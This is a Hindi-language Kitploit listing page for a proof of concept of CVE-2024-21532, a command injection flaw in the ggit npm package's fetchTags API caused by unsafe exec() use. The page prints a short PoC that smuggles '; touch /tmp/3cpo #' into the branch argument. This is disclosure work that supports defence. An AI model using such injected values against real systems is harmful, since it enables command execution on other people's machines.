Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-21532-PoC-ggit — CVE-2024-21532 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, ggit npm पैकेज के fetchTags API में एक कमांड इंजेक्शन कमजोरी, जो असुरक्षित exec() उपयोग को प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/lirantal/cve-2024-21532-poc-ggit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधलर्निंग और शिक्षा
GitHublirantal/cve-2024-21532-poc-ggit

CVE-2024-21532-PoC-ggit

CVE-2024-21532 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, ggit npm पैकेज के fetchTags API में एक कमांड इंजेक्शन कमजोरी, जो असुरक्षित exec() उपयोग को प्रदर्शित करता है।

रिपॉजिटरी देखें
63 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-21532 ggit में कमांड इंजेक्शन भेद्यता

ggit स्वयं को इस प्रकार वर्णित करता है:

Local promise-returning git command wrappers

संसाधन:

  • प्रोजेक्ट का GitHub स्रोत कोड: https://github.com/bahmutov/ggit
  • प्रोजेक्ट का npm पैकेज: https://www.npmjs.com/package/ggit

इस भेद्यता पर लेख: https://nodejs-security.com/blog/flawed-git-promises-library-on-npm-leads-to-command-injection-vulnerability

शोषण की पृष्ठभूमि

मैं ggit npm पैकेज में एक कमांड इंजेक्शन भेद्यता की रिपोर्ट कर रहा हूँ।

यह भेद्यता लाइब्रेरी के fetchTags(branch) API के साथ प्रकट होती है, जो उपयोगकर्ता इनपुट को फ़ेच किए जाने वाले ब्रांच को निर्दिष्ट करने की अनुमति देती है और फिर इस स्ट्रिंग को एक git कमांड के साथ जोड़ती है जिसे बाद में असुरक्षित exec() नोड.जेएस चाइल्ड प्रोसेस API को पास किया जाता है।

शोषण

  1. [email protected] या उससे पहले का संस्करण स्थापित करें
  2. निम्नलिखित POC स्थापित करें:
const fetchTags = require("ggit").fetchTags;
fetchTags("; touch /tmp/3cpo #").then(function () {
  // should be same as running command
  // git pull origin --tags
  console.log("done");
});
  1. देखें कि डिस्क पर /tmp/3cpo पर एक नई फ़ाइल बनाई गई है

योगदान

कृपया इस परियोजना में योगदान के दिशानिर्देशों के लिए CONTRIBUTING देखें।

लेखक

Liran Tal

टूल डाउनलोड करें